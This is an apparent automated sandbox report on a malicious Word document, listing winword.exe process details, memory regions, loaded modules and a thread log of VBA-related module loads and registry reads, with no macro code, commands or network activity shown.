Malicious Microsoft Word Document (Analysis Date 2017-11-28)

Monitored Processes

Behavior Information - Sequential View

Process #1: winword.exe

(Host: 159, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:08, Reason: Analysis Target
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:02:15

OS Process Information

Information	Value
PID	0x9d4
Parent PID	0x584 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A58 0x A54 0x A50 0x A48 0x A38 0x A34 0x A10 0x 9EC 0x 9E8 0x 9E0 0x 9DC 0x 9D8 0x A74 0x A78 0x A7C 0x A80 0x A84 0x A88 0x AAC 0x ACC 0x AD8 0x 8A0 0x 8B0 0x 8F4 0x 910

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00206fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000310000	0x00310000	0x0040ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000410000	0x00410000	0x00411fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000430000	0x00430000	0x00430fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00441fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x00451fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000460000	0x00460000	0x00462fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000470000	0x00470000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000480000	0x00480000	0x00607fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000610000	0x00610000	0x00790fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007a0000	0x007a0000	0x01b9ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01ba0000	0x01e6efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001e70000	0x01e70000	0x02262fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002270000	0x02270000	0x0236ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002370000	0x02370000	0x0237ffff	Private Memory	-	Region Actions
pagefile_0x0000000002380000	0x02380000	0x02382fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002390000	0x02390000	0x02392fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000023a0000	0x023a0000	0x023a2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000023b0000	0x023b0000	0x023b2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000023c0000	0x023c0000	0x023fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002410000	0x02410000	0x0241ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002420000	0x02420000	0x02421fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002470000	0x02470000	0x024effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000024f0000	0x024f0000	0x025cefff	Pagefile Backed Memory	Readable	Region Actions
kernelbase.dll.mui	0x025d0000	0x0268ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000002690000	0x02690000	0x0278ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027a0000	0x027a0000	0x027aefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000027f0000	0x027f0000	0x027f2fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002830000	0x02830000	0x02830fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002840000	0x02840000	0x02844fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002850000	0x02850000	0x02850fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002860000	0x02860000	0x02860fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002870000	0x02870000	0x02870fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002880000	0x02880000	0x02881fff	Pagefile Backed Memory	Readable	Region Actions
msxml6r.dll	0x02890000	0x02890fff	Memory Mapped File	Readable	Region Actions
private_0x00000000028a0000	0x028a0000	0x028affff	Private Memory	Readable, Writable	Region Actions
cfgmgr32.dll	0x028b0000	0x028e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000028f0000	0x028f0000	0x029effff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x029f0000	0x02a14fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002a20000	0x02a20000	0x02b1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b20000	0x02b20000	0x02d1ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002d20000	0x02d20000	0x02d20fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002d30000	0x02d30000	0x02d31fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002d40000	0x02d40000	0x02d40fff	Private Memory	Readable, Writable	Region Actions
c_1255.nls	0x02d50000	0x02d60fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002d70000	0x02d70000	0x02deffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002df0000	0x02df0000	0x02e0ffff	Private Memory	-	Region Actions
onbttnwd.dll	0x02e10000	0x02e14fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002e20000	0x02e20000	0x02e3efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002e40000	0x02e40000	0x02e5ffff	Private Memory	-	Region Actions
private_0x0000000002e60000	0x02e60000	0x02f5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f60000	0x02f60000	0x02f7ffff	Private Memory	-	Region Actions
private_0x0000000002f80000	0x02f80000	0x02f9ffff	Private Memory	-	Region Actions
stdole2.tlb	0x02fa0000	0x02fa3fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002fc0000	0x02fc0000	0x030bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000030c0000	0x030c0000	0x030defff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000030e0000	0x030e0000	0x031dffff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x031e0000	0x0325efff	Memory Mapped File	Readable	Region Actions
private_0x0000000003270000	0x03270000	0x0327ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000032a0000	0x032a0000	0x0339ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000033a0000	0x033a0000	0x0379ffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x037a0000	0x040cffff	Memory Mapped File	Readable	Region Actions
private_0x0000000004100000	0x04100000	0x0411dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004120000	0x04120000	0x0413efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004150000	0x04150000	0x0416efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004180000	0x04180000	0x0419efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000041a0000	0x041a0000	0x0429ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004350000	0x04350000	0x0436efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004370000	0x04370000	0x0437ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004380000	0x04380000	0x0447ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004480000	0x04480000	0x0457ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004580000	0x04580000	0x0459efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000045a0000	0x045a0000	0x045affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004660000	0x04660000	0x046dffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x00000000046e0000	0x046e0000	0x04edffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004ee0000	0x04ee0000	0x04f00fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004f10000	0x04f10000	0x04f2efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004f40000	0x04f40000	0x04fbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004fc0000	0x04fc0000	0x04fddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004ff0000	0x04ff0000	0x050effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005110000	0x05110000	0x0512efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000051c0000	0x051c0000	0x052bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000052c0000	0x052c0000	0x056bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000056e0000	0x056e0000	0x057dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000057e0000	0x057e0000	0x067dffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000006990000	0x06990000	0x06a0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006a10000	0x06a10000	0x06b0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006b70000	0x06b70000	0x06beffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006bf0000	0x06bf0000	0x06feffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007000000	0x07000000	0x070fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007270000	0x07270000	0x072effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000072f0000	0x072f0000	0x07aeffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007af0000	0x07af0000	0x07ef0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007f00000	0x07f00000	0x08300fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008310000	0x08310000	0x08710fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008720000	0x08720000	0x0891ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008920000	0x08920000	0x08ddffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008de0000	0x08de0000	0x091dffff	Private Memory	Readable, Writable	Region Actions
private_0x000000000a4b0000	0x0a4b0000	0x0a961fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000036e80000	0x36e80000	0x36e8ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000000006fff0000	0x6fff0000	0x6fffffff	Private Memory	Readable, Writable, Executable	Region Actions
osppc.dll	0x74490000	0x744c2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77260000	0x77266fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
winword.exe	0x13ffb0000	0x14018afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007febe960000	0x7febe960000	0x7febe96ffff	Private Memory	Readable, Writable, Executable	Region Actions
onbttnwd.dll	0x7fee3a20000	0x7fee3a59fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
chart.dll	0x7fee3a60000	0x7fee4558fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
riched20.dll	0x7fee4560000	0x7fee4782fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fee48c0000	0x7fee4958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x7fee49d0000	0x7fee4b4dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x7fee4b50000	0x7fee4d1ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x7fee4d20000	0x7fee4e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x7fee4e90000	0x7fee500afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x7fee5010000	0x7fee50cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x7fee50d0000	0x7fee9f0efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lres.dll	0x7fee9f10000	0x7feea830fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uires.dll	0x7feea840000	0x7feeab47fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x7feeab50000	0x7feebe2bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lwin32client.dll	0x7feebe30000	0x7feec5fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uiwin32client.dll	0x7feec600000	0x7feeceeafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso30win32client.dll	0x7feecef0000	0x7feed367fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso20win32client.dll	0x7feed370000	0x7feed673fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x7feed680000	0x7feee7ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x7feee7f0000	0x7feee8b5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x7feee8c0000	0x7fef0c5efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef1100000	0x7fef116efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sppc.dll	0x7fef1170000	0x7fef1196fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mlang.dll	0x7fef11a0000	0x7fef11dafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x7fef3780000	0x7fef378bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l1-2-0.dll	0x7fef3bb0000	0x7fef3bb2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-processthreads-l1-1-1.dll	0x7fef3bc0000	0x7fef3bc2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-synch-l1-2-0.dll	0x7fef3d90000	0x7fef3d92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-localization-l1-2-0.dll	0x7fef3da0000	0x7fef3da2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l2-1-0.dll	0x7fef3db0000	0x7fef3db2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-timezone-l1-1-0.dll	0x7fef3dc0000	0x7fef3dc2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ucrtbase.dll	0x7fef3dd0000	0x7fef3ec1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimg32.dll	0x7fef3ed0000	0x7fef3ed6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
c2r64.dll	0x7fef3ee0000	0x7fef4008fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
appvisvstream64.dll	0x7fef4010000	0x7fef4089fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
appvisvsubsystems64.dll	0x7fef4090000	0x7fef42c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x7fef4a60000	0x7fef4c51fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x7fef4cf0000	0x7fef4d60fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl30.dll	0x7fef5270000	0x7fef527efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemsvc.dll	0x7fef5740000	0x7fef5753fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemprox.dll	0x7fef5a40000	0x7fef5a4efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdsapi.dll	0x7fef5a50000	0x7fef5a76fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 561 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0x9d8

(Host: 142, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = Unknown module name, base_address = 0x7fef8cd0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef8d51618	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef8d4f088	1	Fn
Module	Get Handle	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee3590000	1	Fn
Environment	Get Environment String	name = DDRYBUR	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Licenses	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = }	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\user32.dll, base_address = 0x76e70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e894f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e85f08	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e82b00	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76e7ab64	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e85c30	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76e7a730	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76e7a5b4	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = oleaut32.dll, base_address = 0x7feff1c0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feff1c2270	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feff1ca550	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feff2520d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feff24dbd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feff1c5c90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feff1c6330	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feff1e66c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feff1c4710	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feff1c48f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feff1fb640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feff1fb360	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feff202640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feff1e58a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feff1e5820	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feff1faf20	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feff252160	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feff1e5a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feff1e5a30	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feff1c60b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feff219f80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormat, address_out = 0x7feff249b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feff249aa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feff249990	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feff249890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feff249770	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feff22b8d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMonthName, address_out = 0x7feff22b800	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAdd, address_out = 0x7feff2448e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAnd, address_out = 0x7feff249470	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCat, address_out = 0x7feff2496a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDiv, address_out = 0x7feff242fe0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarEqv, address_out = 0x7feff249cf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarIdiv, address_out = 0x7feff248ff0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarImp, address_out = 0x7feff249c00	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMod, address_out = 0x7feff248e60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMul, address_out = 0x7feff243690	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarOr, address_out = 0x7feff2492d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarPow, address_out = 0x7feff242e80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarSub, address_out = 0x7feff243f90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarXor, address_out = 0x7feff2491a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAbs, address_out = 0x7feff227c30	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFix, address_out = 0x7feff227a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarInt, address_out = 0x7feff227890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNeg, address_out = 0x7feff227ea0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNot, address_out = 0x7feff249600	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarRound, address_out = 0x7feff2276a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCmp, address_out = 0x7feff2483f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feff1f3070	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feff1fd700	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feff1fd890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feff1dcaf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feff1e8a00	1	Fn
Module	Get Handle	module_name = ole32.dll, base_address = 0x7fefe810000	1	Fn
Module	Get Address	module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7fefe81de90	1	Fn
Module	Get Address	module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:02 (Local Time)	2	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 78, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee359f200	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409	1	Fn
Registry	Open Key	reg_name = win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
